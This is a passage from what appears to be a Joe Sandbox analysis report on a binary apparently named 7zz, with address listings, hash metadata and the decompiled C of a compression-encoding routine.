                                                                                                                                    0x00435457
                                                                                                                                    0x0043545d
                                                                                                                                    0x00435460
                                                                                                                                    0x00435807
                                                                                                                                    0x0043580e
                                                                                                                                    0x00435810
                                                                                                                                    0x00435812
                                                                                                                                    0x0043587e
                                                                                                                                    0x00435884
                                                                                                                                    0x0043588a
                                                                                                                                    0x0043588e
                                                                                                                                    0x00435891
                                                                                                                                    0x00000000
                                                                                                                                    0x00435891
                                                                                                                                    0x00435814
                                                                                                                                    0x00435817
                                                                                                                                    0x0043581b
                                                                                                                                    0x00435826
                                                                                                                                    0x0043582a
                                                                                                                                    0x00435832
                                                                                                                                    0x00435836
                                                                                                                                    0x0043583e
                                                                                                                                    0x00435842
                                                                                                                                    0x0043584a
                                                                                                                                    0x0043584e
                                                                                                                                    0x00435856
                                                                                                                                    0x0043585a
                                                                                                                                    0x00435862
                                                                                                                                    0x00435866
                                                                                                                                    0x0043586b
                                                                                                                                    0x0043586b
                                                                                                                                    0x0043586b
                                                                                                                                    0x00435872
                                                                                                                                    0x00000000
                                                                                                                                    0x00435872
                                                                                                                                    0x0043546b
                                                                                                                                    0x00435472
                                                                                                                                    0x0043547e
                                                                                                                                    0x00435481
                                                                                                                                    0x004354d6
                                                                                                                                    0x004354d6
                                                                                                                                    0x004354d9
                                                                                                                                    0x004354e0
                                                                                                                                    0x004354e3
                                                                                                                                    0x004354f5
                                                                                                                                    0x004354f8
                                                                                                                                    0x004354fc
                                                                                                                                    0x00435500
                                                                                                                                    0x00435502
                                                                                                                                    0x00435502
                                                                                                                                    0x00435502
                                                                                                                                    0x00435502
                                                                                                                                    0x00435514
                                                                                                                                    0x00435519
                                                                                                                                    0x0043551c
                                                                                                                                    0x0043551f
                                                                                                                                    0x00000000
                                                                                                                                    0x00435525
                                                                                                                                    0x00435525
                                                                                                                                    0x00435527
                                                                                                                                    0x004355bc
                                                                                                                                    0x004355c3
                                                                                                                                    0x004355c7
                                                                                                                                    0x004355cb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004355e0
                                                                                                                                    0x004355e8
                                                                                                                                    0x004355eb
                                                                                                                                    0x004355f1
                                                                                                                                    0x004355f2
                                                                                                                                    0x004355f5
                                                                                                                                    0x004355fb
                                                                                                                                    0x00435604
                                                                                                                                    0x00435609
                                                                                                                                    0x0043560f
                                                                                                                                    0x00435617
                                                                                                                                    0x00435619
                                                                                                                                    0x0043561b
                                                                                                                                    0x004356a7
                                                                                                                                    0x004356aa
                                                                                                                                    0x004356aa
                                                                                                                                    0x004356ad
                                                                                                                                    0x004356b0
                                                                                                                                    0x004356b3
                                                                                                                                    0x004356b6
                                                                                                                                    0x004356c0
                                                                                                                                    0x004356c0
                                                                                                                                    0x004356c5
                                                                                                                                    0x004356c5
                                                                                                                                    0x004356c7
                                                                                                                                    0x004356ca
                                                                                                                                    0x004356cd
                                                                                                                                    0x004356cd
                                                                                                                                    0x004356d5
                                                                                                                                    0x004356d7
                                                                                                                                    0x004356e5
                                                                                                                                    0x004356ee
                                                                                                                                    0x004356ee
                                                                                                                                    0x004356f0
                                                                                                                                    0x00435731
                                                                                                                                    0x00435734
                                                                                                                                    0x00435746
                                                                                                                                    0x00435749
                                                                                                                                    0x00435749
                                                                                                                                    0x0043574c
                                                                                                                                    0x004357db
                                                                                                                                    0x00000000
                                                                                                                                    0x004357db
                                                                                                                                    0x00435752
                                                                                                                                    0x00435756
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0043575c
                                                                                                                                    0x0043575f
                                                                                                                                    0x00435763
                                                                                                                                    0x00435765
                                                                                                                                    0x0043576a
                                                                                                                                    0x0043576a
                                                                                                                                    0x00435773
                                                                                                                                    0x00435777
                                                                                                                                    0x0043577c
                                                                                                                                    0x0043577f
                                                                                                                                    0x00435783
                                                                                                                                    0x00435785
                                                                                                                                    0x0043578a
                                                                                                                                    0x0043578a
                                                                                                                                    0x0043578d
                                                                                                                                    0x00435790
                                                                                                                                    0x00435794
                                                                                                                                    0x00435796
                                                                                                                                    0x0043579b
                                                                                                                                    0x0043579b
                                                                                                                                    0x0043579e
                                                                                                                                    0x004357a1
                                                                                                                                    0x004357a5
                                                                                                                                    0x004357a7
                                                                                                                                    0x004357ac
                                                                                                                                    0x004357ac
                                                                                                                                    0x004357b2
                                                                                                                                    0x004357b6
                                                                                                                                    0x004357be
                                                                                                                                    0x004357c2
                                                                                                                                    0x004357c7
                                                                                                                                    0x004357c7
                                                                                                                                    0x004357c7
                                                                                                                                    0x004357ce
                                                                                                                                    0x004357d3
                                                                                                                                    0x004357d3
                                                                                                                                    0x00000000
                                                                                                                                    0x004357d3
                                                                                                                                    0x004356f2
                                                                                                                                    0x004356f2
                                                                                                                                    0x004356f3
                                                                                                                                    0x00435726
                                                                                                                                    0x0043572c
                                                                                                                                    0x00000000
                                                                                                                                    0x0043572c
                                                                                                                                    0x004356f5
                                                                                                                                    0x004356f5
                                                                                                                                    0x004356f6
                                                                                                                                    0x00435712
                                                                                                                                    0x00435718
                                                                                                                                    0x00000000
                                                                                                                                    0x00435718
                                                                                                                                    0x004356f8
                                                                                                                                    0x004356f9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00435701
                                                                                                                                    0x00435707
                                                                                                                                    0x00000000
                                                                                                                                    0x00435707
                                                                                                                                    0x004356d9
                                                                                                                                    0x004356df
                                                                                                                                    0x004356df
                                                                                                                                    0x004356e2
                                                                                                                                    0x00000000
                                                                                                                                    0x004356e2
                                                                                                                                    0x004356db
                                                                                                                                    0x004356dd
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004356dd
                                                                                                                                    0x004356b8
                                                                                                                                    0x004356be
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004356be
                                                                                                                                    0x00435621
                                                                                                                                    0x00435624
                                                                                                                                    0x00435628
                                                                                                                                    0x0043562a
                                                                                                                                    0x0043562f
                                                                                                                                    0x0043562f
                                                                                                                                    0x00435638
                                                                                                                                    0x0043563c
                                                                                                                                    0x00435641
                                                                                                                                    0x00435644
                                                                                                                                    0x00435648
                                                                                                                                    0x0043564a
                                                                                                                                    0x0043564f
                                                                                                                                    0x0043564f
                                                                                                                                    0x00435652
                                                                                                                                    0x00435655
                                                                                                                                    0x00435659
                                                                                                                                    0x0043565b
                                                                                                                                    0x00435660
                                                                                                                                    0x00435660
                                                                                                                                    0x00435663
                                                                                                                                    0x00435666
                                                                                                                                    0x0043566a
                                                                                                                                    0x0043566c
                                                                                                                                    0x00435671
                                                                                                                                    0x00435671
                                                                                                                                    0x00435674
                                                                                                                                    0x00435677
                                                                                                                                    0x0043567b
                                                                                                                                    0x0043567d
                                                                                                                                    0x00435682
                                                                                                                                    0x00435682
                                                                                                                                    0x00435685
                                                                                                                                    0x00435688
                                                                                                                                    0x0043568c
                                                                                                                                    0x0043568e
                                                                                                                                    0x00435693
                                                                                                                                    0x00435693
                                                                                                                                    0x00435696
                                                                                                                                    0x00435699
                                                                                                                                    0x0043569d
                                                                                                                                    0x00000000
                                                                                                                                    0x0043569d
                                                                                                                                    0x0043552d
                                                                                                                                    0x00435530
                                                                                                                                    0x00435534
                                                                                                                                    0x00435536
                                                                                                                                    0x0043553b
                                                                                                                                    0x0043553b
                                                                                                                                    0x00435544
                                                                                                                                    0x00435548
                                                                                                                                    0x0043554d
                                                                                                                                    0x00435550
                                                                                                                                    0x00435554
                                                                                                                                    0x00435556
                                                                                                                                    0x0043555b
                                                                                                                                    0x0043555b
                                                                                                                                    0x0043555e
                                                                                                                                    0x00435561
                                                                                                                                    0x00435565
                                                                                                                                    0x00435567
                                                                                                                                    0x0043556c
                                                                                                                                    0x0043556c
                                                                                                                                    0x0043556f
                                                                                                                                    0x00435572
                                                                                                                                    0x00435576
                                                                                                                                    0x00435578
                                                                                                                                    0x0043557d
                                                                                                                                    0x0043557d
                                                                                                                                    0x00435580
                                                                                                                                    0x00435583
                                                                                                                                    0x00435587
                                                                                                                                    0x00435589
                                                                                                                                    0x0043558e
                                                                                                                                    0x0043558e
                                                                                                                                    0x00435591
                                                                                                                                    0x00435594
                                                                                                                                    0x00435598
                                                                                                                                    0x0043559a
                                                                                                                                    0x0043559f
                                                                                                                                    0x0043559f
                                                                                                                                    0x004355a2
                                                                                                                                    0x004355a5
                                                                                                                                    0x004355a9
                                                                                                                                    0x004355ab
                                                                                                                                    0x004355b4
                                                                                                                                    0x004355b4
                                                                                                                                    0x00000000
                                                                                                                                    0x004355ab
                                                                                                                                    0x0043551f
                                                                                                                                    0x004354e5
                                                                                                                                    0x004354e8
                                                                                                                                    0x004354ec
                                                                                                                                    0x00000000
                                                                                                                                    0x004354ec
                                                                                                                                    0x00435483
                                                                                                                                    0x0043548c
                                                                                                                                    0x00435494
                                                                                                                                    0x00435497
                                                                                                                                    0x00435499
                                                                                                                                    0x004354a1
                                                                                                                                    0x004354a1
                                                                                                                                    0x0043549b
                                                                                                                                    0x0043549b
                                                                                                                                    0x0043549b
                                                                                                                                    0x004354ab
                                                                                                                                    0x004354b0
                                                                                                                                    0x004354bb
                                                                                                                                    0x004354c4
                                                                                                                                    0x004354c6
                                                                                                                                    0x004354c8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004354c8
                                                                                                                                    0x004357e4
                                                                                                                                    0x004357e8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004357f1
                                                                                                                                    0x004357f3
                                                                                                                                    0x004357f5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00435800
                                                                                                                                    0x00435803
                                                                                                                                    0x00435805
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004352ed
                                                                                                                                    0x004352ed
                                                                                                                                    0x004352ed
                                                                                                                                    0x004352ee
                                                                                                                                    0x004353d0
                                                                                                                                    0x004353d7
                                                                                                                                    0x004353d9
                                                                                                                                    0x004353e4
                                                                                                                                    0x004353e6
                                                                                                                                    0x004353e9
                                                                                                                                    0x004353eb
                                                                                                                                    0x004353ef
                                                                                                                                    0x004353f8
                                                                                                                                    0x004353f8
                                                                                                                                    0x004353f1
                                                                                                                                    0x004353f1
                                                                                                                                    0x004353f1
                                                                                                                                    0x004353fe
                                                                                                                                    0x00435402
                                                                                                                                    0x00435408
                                                                                                                                    0x00435408
                                                                                                                                    0x00435410
                                                                                                                                    0x00000000
                                                                                                                                    0x00435410
                                                                                                                                    0x004352f4
                                                                                                                                    0x004352f4
                                                                                                                                    0x004352f5
                                                                                                                                    0x0043538a
                                                                                                                                    0x0043538e
                                                                                                                                    0x00435390
                                                                                                                                    0x0043539b
                                                                                                                                    0x0043539d
                                                                                                                                    0x004353a0
                                                                                                                                    0x004353a2
                                                                                                                                    0x004353a6
                                                                                                                                    0x004353af
                                                                                                                                    0x004353af
                                                                                                                                    0x004353a8
                                                                                                                                    0x004353a8
                                                                                                                                    0x004353a8
                                                                                                                                    0x004353b5
                                                                                                                                    0x004353b9
                                                                                                                                    0x004353bc
                                                                                                                                    0x004353bc
                                                                                                                                    0x004353c8
                                                                                                                                    0x00000000
                                                                                                                                    0x004353c8
                                                                                                                                    0x004352fb
                                                                                                                                    0x004352fc
                                                                                                                                    0x00435335
                                                                                                                                    0x00435339
                                                                                                                                    0x0043533b
                                                                                                                                    0x00435346
                                                                                                                                    0x00435348
                                                                                                                                    0x0043534b
                                                                                                                                    0x0043534d
                                                                                                                                    0x00435351
                                                                                                                                    0x0043535c
                                                                                                                                    0x0043535c
                                                                                                                                    0x00435353
                                                                                                                                    0x00435355
                                                                                                                                    0x00435355
                                                                                                                                    0x00435362
                                                                                                                                    0x00435366
                                                                                                                                    0x00435369
                                                                                                                                    0x00435369
                                                                                                                                    0x0043537b
                                                                                                                                    0x0043537d
                                                                                                                                    0x0043537f
                                                                                                                                    0x00000000
                                                                                                                                    0x00435385
                                                                                                                                    0x004354ca
                                                                                                                                    0x004354ca
                                                                                                                                    0x004354cd
                                                                                                                                    0x00000000
                                                                                                                                    0x004354cd
                                                                                                                                    0x0043537f
                                                                                                                                    0x00435305
                                                                                                                                    0x00435307
                                                                                                                                    0x00435309
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00435312
                                                                                                                                    0x00435316
                                                                                                                                    0x00435316
                                                                                                                                    0x00435316
                                                                                                                                    0x0043531c
                                                                                                                                    0x0043531f
                                                                                                                                    0x00000000
                                                                                                                                    0x0043531f
                                                                                                                                    0x004352e7
                                                                                                                                    0x004350db
                                                                                                                                    0x004350e1
                                                                                                                                    0x004350e4
                                                                                                                                    0x004350e8
                                                                                                                                    0x004350f4
                                                                                                                                    0x004350fb
                                                                                                                                    0x004350fd
                                                                                                                                    0x004350ff
                                                                                                                                    0x0043510e
                                                                                                                                    0x0043510e
                                                                                                                                    0x00435111
                                                                                                                                    0x00000000
                                                                                                                                    0x00435111
                                                                                                                                    0x00435108
                                                                                                                                    0x0043510a
                                                                                                                                    0x0043510c
                                                                                                                                    0x0043511a
                                                                                                                                    0x0043511d
                                                                                                                                    0x0043511f
                                                                                                                                    0x00435124
                                                                                                                                    0x00435127
                                                                                                                                    0x00435127
                                                                                                                                    0x00435127
                                                                                                                                    0x00435127
                                                                                                                                    0x00435133
                                                                                                                                    0x00435135
                                                                                                                                    0x00435138
                                                                                                                                    0x0043513a
                                                                                                                                    0x00000000
                                                                                                                                    0x0043513a
                                                                                                                                    0x00000000
                                                                                                                                    0x00434fd8
                                                                                                                                    0x00434fda
                                                                                                                                    0x00434fe0
                                                                                                                                    0x00434fe3
                                                                                                                                    0x00434fe7
                                                                                                                                    0x00434ff3
                                                                                                                                    0x00434ffa
                                                                                                                                    0x00434ffc
                                                                                                                                    0x00434ffe
                                                                                                                                    0x0043509a
                                                                                                                                    0x0043509c
                                                                                                                                    0x0043509e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004350a4
                                                                                                                                    0x004350a7
                                                                                                                                    0x004350a9
                                                                                                                                    0x004350ae
                                                                                                                                    0x004350b1
                                                                                                                                    0x004350b1
                                                                                                                                    0x004350b1
                                                                                                                                    0x004350b1
                                                                                                                                    0x004350bc
                                                                                                                                    0x004350be
                                                                                                                                    0x004350c1
                                                                                                                                    0x004350c3
                                                                                                                                    0x0043513e
                                                                                                                                    0x0043513e
                                                                                                                                    0x00435322
                                                                                                                                    0x00435322
                                                                                                                                    0x00435324
                                                                                                                                    0x0043532d
                                                                                                                                    0x0043532d
                                                                                                                                    0x00000000
                                                                                                                                    0x00435324
                                                                                                                                    0x0043500b
                                                                                                                                    0x0043500b
                                                                                                                                    0x0043500d
                                                                                                                                    0x00435012
                                                                                                                                    0x00435012
                                                                                                                                    0x00435015
                                                                                                                                    0x0043501b
                                                                                                                                    0x0043501f
                                                                                                                                    0x00435024
                                                                                                                                    0x00435027
                                                                                                                                    0x0043502b
                                                                                                                                    0x0043502d
                                                                                                                                    0x00435032
                                                                                                                                    0x00435032
                                                                                                                                    0x00435035
                                                                                                                                    0x00435038
                                                                                                                                    0x0043503c
                                                                                                                                    0x0043503e
                                                                                                                                    0x00435043
                                                                                                                                    0x00435043
                                                                                                                                    0x00435046
                                                                                                                                    0x00435049
                                                                                                                                    0x0043504d
                                                                                                                                    0x0043504f
                                                                                                                                    0x00435054
                                                                                                                                    0x00435054
                                                                                                                                    0x00435057
                                                                                                                                    0x0043505a
                                                                                                                                    0x0043505e
                                                                                                                                    0x00435060
                                                                                                                                    0x00435065
                                                                                                                                    0x00435065
                                                                                                                                    0x00435068
                                                                                                                                    0x0043506b
                                                                                                                                    0x0043506f
                                                                                                                                    0x00435071
                                                                                                                                    0x00435076
                                                                                                                                    0x00435076
                                                                                                                                    0x00435079
                                                                                                                                    0x0043507c
                                                                                                                                    0x00435080
                                                                                                                                    0x00435082
                                                                                                                                    0x00435082
                                                                                                                                    0x0043508b
                                                                                                                                    0x0043508b
                                                                                                                                    0x00435877
                                                                                                                                    0x00435877
                                                                                                                                    0x00000000
                                                                                                                                    0x00435877
                                                                                                                                    0x00435004
                                                                                                                                    0x00435004
                                                                                                                                    0x00435007
                                                                                                                                    0x00000000
                                                                                                                                    0x00435007
                                                                                                                                    0x00434fd2
                                                                                                                                    0x004358a1
                                                                                                                                    0x004358a5
                                                                                                                                    0x004358ad
                                                                                                                                    0x004358b1
                                                                                                                                    0x004358b9
                                                                                                                                    0x004358bd
                                                                                                                                    0x004358c5
                                                                                                                                    0x004358c9
                                                                                                                                    0x004358d1
                                                                                                                                    0x004358d5
                                                                                                                                    0x004358dd
                                                                                                                                    0x004358e1
                                                                                                                                    0x004358e6
                                                                                                                                    0x004358e6
                                                                                                                                    0x004358e6
                                                                                                                                    0x004358ed
                                                                                                                                    0x00000000
                                                                                                                                    0x00434eeb
                                                                                                                                    0x00434eeb
                                                                                                                                    0x00434eee
                                                                                                                                    0x00434ef2
                                                                                                                                    0x00434ef4
                                                                                                                                    0x00434ef9
                                                                                                                                    0x00434ef9
                                                                                                                                    0x00434efc
                                                                                                                                    0x00434eff
                                                                                                                                    0x00434f03
                                                                                                                                    0x00434f05
                                                                                                                                    0x00434f0a
                                                                                                                                    0x00434f0a
                                                                                                                                    0x00434f0d
                                                                                                                                    0x00434f10
                                                                                                                                    0x00434f14
                                                                                                                                    0x00434f16
                                                                                                                                    0x00434f1b
                                                                                                                                    0x00434f1b
                                                                                                                                    0x00434f1e
                                                                                                                                    0x00434f21
                                                                                                                                    0x00434f25
                                                                                                                                    0x00434f27
                                                                                                                                    0x00434f2c
                                                                                                                                    0x00434f2c
                                                                                                                                    0x00434f2f
                                                                                                                                    0x00434f32
                                                                                                                                    0x00434f36
                                                                                                                                    0x00434f38
                                                                                                                                    0x00434f3d
                                                                                                                                    0x00434f3d
                                                                                                                                    0x00434f40
                                                                                                                                    0x00434f43
                                                                                                                                    0x00434f47
                                                                                                                                    0x00434f49
                                                                                                                                    0x00434f4e
                                                                                                                                    0x00434f4e
                                                                                                                                    0x00434f51
                                                                                                                                    0x00434f56
                                                                                                                                    0x00434f5b
                                                                                                                                    0x00434f64
                                                                                                                                    0x00434f64
                                                                                                                                    0x00434ee9

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00434D2D
                                                                                                                                      • Part of subcall function 004358FF: __EH_prolog.LIBCMT ref: 00435904
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: dd599e63e9cd088cceaa4f877d2aaeff11046bec2ccbbc57bf79bf9ee294da2e
                                                                                                                                    • Instruction ID: 4d673e12acc69f6e7e4ec967f927a2294ce107ae818d378fe87eae4aebf1c3ce
                                                                                                                                    • Opcode Fuzzy Hash: dd599e63e9cd088cceaa4f877d2aaeff11046bec2ccbbc57bf79bf9ee294da2e
                                                                                                                                    • Instruction Fuzzy Hash: 91926D70D00659DFDF14DFA8C594BAEBBB4BF48304F14409AE845AB382DB38AE45CB65
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00448730 Relevance: 1.9, Strings: 1, Instructions: 670COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E00448730(intOrPtr __ecx, void* __eflags) {
				void* _t321;
				unsigned int _t322;
				signed int _t331;
				signed char _t334;
				signed int _t335;
				intOrPtr* _t337;
				intOrPtr _t341;
				signed int _t342;
				signed int _t345;
				signed int _t346;
				void* _t347;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t361;
				intOrPtr* _t364;
				signed int _t368;
				char _t369;
				char _t370;
				signed int _t379;
				signed int _t382;
				signed int _t383;
				signed int* _t385;
				intOrPtr _t387;
				intOrPtr _t399;
				void* _t414;
				signed int _t417;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				void* _t429;
				char _t430;
				void* _t431;
				signed char _t433;
				intOrPtr _t444;
				signed int _t461;
				void* _t469;
				signed int* _t470;
				void* _t475;
				intOrPtr _t478;
				void* _t479;
				void* _t483;
				void* _t484;
				signed int _t498;
				signed int* _t499;
				signed char _t500;
				void* _t519;
				unsigned int _t525;
				char _t536;
				void* _t538;
				intOrPtr _t539;
				signed int* _t544;
				intOrPtr _t552;
				signed int _t565;
				signed char _t568;
				intOrPtr* _t572;
				signed int _t575;
				signed int _t576;
				intOrPtr _t585;
				intOrPtr _t586;
				signed int _t587;
				signed int _t588;
				void* _t589;
				void* _t591;
				void* _t592;
				void* _t593;
				unsigned int _t595;
				signed int _t596;
				intOrPtr _t598;
				void* _t599;
				unsigned int _t600;
				void* _t601;
				signed int _t604;
				signed int _t605;
				void* _t608;
				intOrPtr* _t609;
				intOrPtr _t610;
				void* _t611;
				intOrPtr* _t612;
				void* _t613;
				void* _t614;
				signed int _t616;
				intOrPtr _t627;
				signed int _t628;
				intOrPtr _t629;
				intOrPtr _t631;
				intOrPtr _t632;
				void* _t633;
				void* _t634;
				void* _t635;
				void* _t636;

				_t627 = __ecx;
				 *((intOrPtr*)(_t634 + 0x58)) = __ecx;
				E00448610(0);
				_t598 =  *((intOrPtr*)(_t634 + 0x680));
				_push(_t598);
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0xc)) + E00459170( *((intOrPtr*)(__ecx + 0xc)),  *((intOrPtr*)(_t634 + 0x67c))) * 4)) = _t598;
				E00448580(__ecx, _t318, 0x18);
				 *((intOrPtr*)(_t634 + 0x60)) = 0;
				 *((intOrPtr*)(_t634 + 0x64)) = 0;
				_t414 = 0;
				 *((intOrPtr*)(_t634 + 0x68)) = 0;
				_t321 = memset(_t634 + 0x170, 0, 0x40 << 2);
				_t635 = _t634 + 0xc;
				 *((intOrPtr*)(_t635 + 0x6c)) = 0;
				if(_t598 > 0) {
					do {
						_t321 = _t321 + 1;
						 *((char*)(_t635 + 0x170)) = 1;
					} while (_t321 < _t598);
				}
				_t322 = 0;
				do {
					if( *((intOrPtr*)(_t635 + _t322 + 0x170)) != 0) {
						 *(_t635 + _t414 + 0x70) = _t322;
						_t414 = _t414 + 1;
						 *((char*)(_t635 + (_t322 >> 4) + 0x60)) = 1;
					}
					_t322 = _t322 + 1;
				} while (_t322 < 0x100);
				_t599 = 0;
				do {
					E00448610( *((intOrPtr*)(_t635 + _t599 + 0x60)));
					_t599 = _t599 + 1;
				} while (_t599 < 0x10);
				_t600 = 0;
				do {
					if( *((intOrPtr*)(_t635 + (_t600 >> 4) + 0x60)) != 0) {
						E00448610( *((intOrPtr*)(_t635 + _t600 + 0x170)));
					}
					_t600 = _t600 + 1;
				} while (_t600 < 0x100);
				 *((intOrPtr*)(_t635 + 0x3c)) =  *((intOrPtr*)(_t627 + 4));
				memset(_t635 + 0x270, 0, 0x102 << 2);
				_t636 = _t635 + 0xc;
				_t585 =  *((intOrPtr*)(_t636 + 0x3c));
				_t601 = 0;
				_t525 = 0;
				 *(_t636 + 0x38) = _t414 + 2;
				 *(_t636 + 0x1c) = 0;
				 *((intOrPtr*)(_t636 + 0x67c)) =  *((intOrPtr*)(_t636 + 0x67c)) - 1;
				 *((intOrPtr*)(_t636 + 0x20)) =  *((intOrPtr*)(_t627 + 0xc));
				do {
					_t461 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t636 + 0x20)))) +  *((intOrPtr*)(_t636 + 0x67c))));
					_t331 = 0;
					 *(_t636 + 0x17) = _t461;
					if( *(_t636 + 0x70) != _t461) {
						do {
							_t444 =  *((intOrPtr*)(_t636 + _t331 + 0x71));
							_t331 = _t331 + 1;
						} while (_t444 != _t461);
					}
					_t417 = _t331;
					 *(_t636 + 0x2c) = _t417;
					if(_t331 >= 8) {
						_t519 = _t636 + 0x70 - 1;
						do {
							 *((char*)(_t519 + _t331 + 1)) =  *((intOrPtr*)(_t519 + _t331));
							 *((char*)(_t519 + _t331)) =  *((intOrPtr*)(_t519 + _t331 - 1));
							 *((char*)(_t519 + _t331 - 1)) =  *((intOrPtr*)(_t519 + _t331 - 2));
							 *((char*)(_t519 + _t331 - 2)) =  *((intOrPtr*)(_t519 + _t331 - 3));
							 *((char*)(_t519 + _t331 - 3)) =  *((intOrPtr*)(_t519 + _t331 - 4));
							 *((char*)(_t519 + _t331 - 4)) =  *((intOrPtr*)(_t519 + _t331 - 5));
							 *((char*)(_t519 + _t331 - 5)) =  *((intOrPtr*)(_t519 + _t331 - 6));
							 *((char*)(_t519 + _t331 - 6)) =  *((intOrPtr*)(_t519 + _t331 - 7));
							_t331 = _t331 - 8;
						} while (_t331 >= 8);
						_t417 =  *(_t636 + 0x2c);
						_t461 =  *(_t636 + 0x17);
					}
					if(_t331 > 0) {
						do {
							 *((char*)(_t636 + _t331 + 0x70)) =  *((intOrPtr*)(_t636 + _t331 + 0x6f));
							_t331 = _t331 - 1;
						} while (_t331 > 0);
						_t417 =  *(_t636 + 0x2c);
					}
					 *(_t636 + 0x70) = _t461;
					if(_t417 != 0) {
						if(_t525 != 0) {
							do {
								_t576 = _t525 - 1;
								 *(_t601 + _t585) = _t576 & 0x00000001;
								_t601 = _t601 + 1;
								_t525 = _t576 >> 1;
								 *((intOrPtr*)(_t636 + 0x270 + (_t576 & 0x00000001) * 4)) =  *((intOrPtr*)(_t636 + 0x270 + (_t576 & 0x00000001) * 4)) + 1;
							} while (_t525 != 0);
						}
						if(_t417 < 0xfe) {
							 *(_t601 + _t585) = _t417 + 1;
						} else {
							 *(_t601 + _t585) = 0xff;
							_t601 = _t601 + 1;
							 *(_t601 + _t585) = _t417 + 2;
						}
						_t601 = _t601 + 1;
						 *((intOrPtr*)(_t636 + 0x274 + _t417 * 4)) =  *((intOrPtr*)(_t636 + 0x274 + _t417 * 4)) + 1;
					} else {
						_t525 = _t525 + 1;
					}
					_t334 =  *(_t636 + 0x1c) + 1;
					 *(_t636 + 0x1c) = _t334;
					 *((intOrPtr*)(_t636 + 0x20)) =  *((intOrPtr*)(_t636 + 0x20)) + 4;
				} while (_t334 <  *((intOrPtr*)(_t636 + 0x680)));
				if(_t525 != 0) {
					do {
						_t575 = _t525 - 1;
						 *(_t601 + _t585) = _t575 & 0x00000001;
						_t601 = _t601 + 1;
						_t525 = _t575 >> 1;
						 *((intOrPtr*)(_t636 + 0x270 + (_t575 & 0x00000001) * 4)) =  *((intOrPtr*)(_t636 + 0x270 + (_t575 & 0x00000001) * 4)) + 1;
					} while (_t525 != 0);
				}
				_t335 =  *(_t636 + 0x38);
				if(_t335 >= 0x100) {
					 *(_t601 + _t585) = 0xff;
					_t601 = _t601 + 1;
					 *(_t601 + _t585) = _t335;
				} else {
					 *(_t601 + _t585) = _t335 - 1;
				}
				 *((intOrPtr*)(_t636 + 0x26c + _t335 * 4)) =  *((intOrPtr*)(_t636 + 0x26c + _t335 * 4)) + 1;
				 *((intOrPtr*)(_t636 + 0x20)) = _t601 + 1;
				_t420 = 0;
				_t337 = _t636 + 0x270;
				_t469 = 0x102;
				do {
					_t586 =  *_t337;
					_t337 = _t337 + 4;
					_t420 = _t420 + _t586;
					_t469 = _t469 - 1;
				} while (_t469 != 0);
				_t470 =  *(_t627 + 0x10);
				_t587 = 2;
				 *(_t636 + 0x5c) = _t420;
				 *(_t636 + 0x48) = 2;
				 *((intOrPtr*)(_t636 + 0x50)) = 0xffffffff;
				 *(_t636 + 0x2c) = 2;
				_t604 = 8 +  *_t470 * 8 - _t470[1];
				 *(_t636 + 0x17) = _t470[2];
				_t138 = _t420 + 0x31; // 0x31
				 *(_t636 + 0x58) = _t604;
				 *(_t636 + 0x4c) = 0x51eb851f * _t138 >> 0x20 >> 4;
				while(1) {
					_t341 =  *((intOrPtr*)(_t627 + 0x8cdc));
					if(_t341 == 0) {
						goto L44;
					}
					 *_t470 = _t604 >> 3;
					_t470[1] = 8;
					_t499 =  *(_t627 + 0x10);
					_t499[1] = 8 - (_t604 & 0x00000007);
					_t499[2] =  *(_t636 + 0x17);
					if(_t587 > 6) {
						_t342 =  *(_t636 + 0x48);
						L51:
						 *(_t636 + 0x18) = _t342;
					} else {
						 *(_t636 + 0x18) = _t587;
					}
					L52:
					_t588 =  *(_t636 + 0x18);
					E00448580(_t627, _t588, 3);
